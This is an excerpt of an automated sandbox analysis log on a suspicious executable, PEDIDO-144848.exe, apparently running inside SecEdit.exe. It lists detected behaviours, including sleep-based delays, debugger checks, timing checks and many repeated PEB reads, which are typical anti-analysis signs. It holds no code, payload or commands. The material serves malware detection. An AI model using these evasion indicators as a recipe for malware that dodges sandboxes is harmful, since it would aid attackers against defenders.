        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exe TID: 3104Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405642
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_004060A4 FindFirstFileA,FindClose, 0_2_004060A4
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
        Source: PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115460098433.0000000006B73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe API call chain: ExitProcess graph end node graph_0-3797
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe API call chain: ExitProcess graph end node graph_0-3977
        Source: C:\Windows\SysWOW64\SecEdit.exe Process information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\SecEdit.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36C41763 rdtsc 2_2_36C41763
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_00401759 lstrcatA,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatA, 0_2_00401759
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exe Code function: 2_2_36CA86C2 mov eax, dword ptr fs:[00000030h] 2_2_36CA86C2
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B5E0 mov eax, dword ptr fs:[00000030h]2_2_36C0B5E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A5E7 mov ebx, dword ptr fs:[00000030h]2_2_36C3A5E7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A5E7 mov eax, dword ptr fs:[00000030h]2_2_36C3A5E7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C315EF mov eax, dword ptr fs:[00000030h]2_2_36C315EF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C5FC mov eax, dword ptr fs:[00000030h]2_2_36C8C5FC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A580 mov eax, dword ptr fs:[00000030h]2_2_36C3A580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A580 mov eax, dword ptr fs:[00000030h]2_2_36C3A580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C39580 mov eax, dword ptr fs:[00000030h]2_2_36C39580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C39580 mov eax, dword ptr fs:[00000030h]2_2_36C39580
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF582 mov eax, dword ptr fs:[00000030h]2_2_36CBF582
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E588 mov eax, dword ptr fs:[00000030h]2_2_36C7E588
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E588 mov eax, dword ptr fs:[00000030h]2_2_36C7E588
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C32594 mov eax, dword ptr fs:[00000030h]2_2_36C32594
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C592 mov eax, dword ptr fs:[00000030h]2_2_36C8C592
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C885AA mov eax, dword ptr fs:[00000030h]2_2_36C885AA
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C045B0 mov eax, dword ptr fs:[00000030h]2_2_36C045B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C045B0 mov eax, dword ptr fs:[00000030h]2_2_36C045B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFF5C7 mov eax, dword ptr fs:[00000030h]2_2_36BFF5C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF753F mov eax, dword ptr fs:[00000030h]2_2_36BF753F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C36540 mov eax, dword ptr fs:[00000030h]2_2_36C36540
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C38540 mov eax, dword ptr fs:[00000030h]2_2_36C38540
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1E547 mov eax, dword ptr fs:[00000030h]2_2_36C1E547
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0754C mov eax, dword ptr fs:[00000030h]2_2_36C0754C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0254C mov eax, dword ptr fs:[00000030h]2_2_36C0254C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB55F mov eax, dword ptr fs:[00000030h]2_2_36CDB55F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB55F mov eax, dword ptr fs:[00000030h]2_2_36CDB55F
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CCA553 mov eax, dword ptr fs:[00000030h]2_2_36CCA553
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1C560 mov eax, dword ptr fs:[00000030h]2_2_36C1C560
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB502 mov eax, dword ptr fs:[00000030h]2_2_36BFB502
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C02500 mov eax, dword ptr fs:[00000030h]2_2_36C02500
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2E507 mov eax, dword ptr fs:[00000030h]2_2_36C2E507
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C50D mov eax, dword ptr fs:[00000030h]2_2_36C3C50D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3C50D mov eax, dword ptr fs:[00000030h]2_2_36C3C50D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov ecx, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov ecx, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CAF51B mov eax, dword ptr fs:[00000030h]2_2_36CAF51B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8C51D mov eax, dword ptr fs:[00000030h]2_2_36C8C51D
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C21514 mov eax, dword ptr fs:[00000030h]2_2_36C21514
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3F523 mov eax, dword ptr fs:[00000030h]2_2_36C3F523
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C31527 mov eax, dword ptr fs:[00000030h]2_2_36C31527
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1252B mov eax, dword ptr fs:[00000030h]2_2_36C1252B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C03536 mov eax, dword ptr fs:[00000030h]2_2_36C03536
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C03536 mov eax, dword ptr fs:[00000030h]2_2_36C03536
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C42539 mov eax, dword ptr fs:[00000030h]2_2_36C42539
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C332C0 mov eax, dword ptr fs:[00000030h]2_2_36C332C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C332C0 mov eax, dword ptr fs:[00000030h]2_2_36C332C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CD32C9 mov eax, dword ptr fs:[00000030h]2_2_36CD32C9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C232C5 mov eax, dword ptr fs:[00000030h]2_2_36C232C5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC2B0 mov ecx, dword ptr fs:[00000030h]2_2_36BFC2B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF92AF mov eax, dword ptr fs:[00000030h]2_2_36BF92AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0A2E0 mov eax, dword ptr fs:[00000030h]2_2_36C0A2E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C082E0 mov eax, dword ptr fs:[00000030h]2_2_36C082E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C102F9 mov eax, dword ptr fs:[00000030h]2_2_36C102F9
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7E289 mov eax, dword ptr fs:[00000030h]2_2_36C7E289
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD2EC mov eax, dword ptr fs:[00000030h]2_2_36BFD2EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFD2EC mov eax, dword ptr fs:[00000030h]2_2_36BFD2EC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF72E0 mov eax, dword ptr fs:[00000030h]2_2_36BF72E0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF2AE mov eax, dword ptr fs:[00000030h]2_2_36CBF2AE
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC92AB mov eax, dword ptr fs:[00000030h]2_2_36CC92AB
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C242AF mov eax, dword ptr fs:[00000030h]2_2_36C242AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C242AF mov eax, dword ptr fs:[00000030h]2_2_36C242AF
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CDB2BC mov eax, dword ptr fs:[00000030h]2_2_36CDB2BC
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CC124C mov eax, dword ptr fs:[00000030h]2_2_36CC124C
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2F24A mov eax, dword ptr fs:[00000030h]2_2_36C2F24A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF247 mov eax, dword ptr fs:[00000030h]2_2_36CBF247
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BF821B mov eax, dword ptr fs:[00000030h]2_2_36BF821B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C9327E mov eax, dword ptr fs:[00000030h]2_2_36C9327E
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBD270 mov eax, dword ptr fs:[00000030h]2_2_36CBD270
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFA200 mov eax, dword ptr fs:[00000030h]2_2_36BFA200
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFB273 mov eax, dword ptr fs:[00000030h]2_2_36BFB273
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8B214 mov eax, dword ptr fs:[00000030h]2_2_36C8B214
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C8B214 mov eax, dword ptr fs:[00000030h]2_2_36C8B214
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A22B mov eax, dword ptr fs:[00000030h]2_2_36C3A22B
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C80227 mov eax, dword ptr fs:[00000030h]2_2_36C80227
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C20230 mov ecx, dword ptr fs:[00000030h]2_2_36C20230
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C063CB mov eax, dword ptr fs:[00000030h]2_2_36C063CB
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C333D0 mov eax, dword ptr fs:[00000030h]2_2_36C333D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C343D0 mov ecx, dword ptr fs:[00000030h]2_2_36C343D0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C843D5 mov eax, dword ptr fs:[00000030h]2_2_36C843D5
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C01380 mov eax, dword ptr fs:[00000030h]2_2_36C01380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C1F380 mov eax, dword ptr fs:[00000030h]2_2_36C1F380
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36CBF38A mov eax, dword ptr fs:[00000030h]2_2_36CBF38A
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C2A390 mov eax, dword ptr fs:[00000030h]2_2_36C2A390
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C093A6 mov eax, dword ptr fs:[00000030h]2_2_36C093A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C093A6 mov eax, dword ptr fs:[00000030h]2_2_36C093A6
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C7C3B0 mov eax, dword ptr fs:[00000030h]2_2_36C7C3B0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFC3C7 mov eax, dword ptr fs:[00000030h]2_2_36BFC3C7
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE3C0 mov eax, dword ptr fs:[00000030h]2_2_36BFE3C0
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3A350 mov eax, dword ptr fs:[00000030h]2_2_36C3A350
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36BFE328 mov eax, dword ptr fs:[00000030h]2_2_36BFE328
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C0B360 mov eax, dword ptr fs:[00000030h]2_2_36C0B360
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 2_2_36C3E363 mov eax, dword ptr fs:[00000030h]2_2_36C3E363
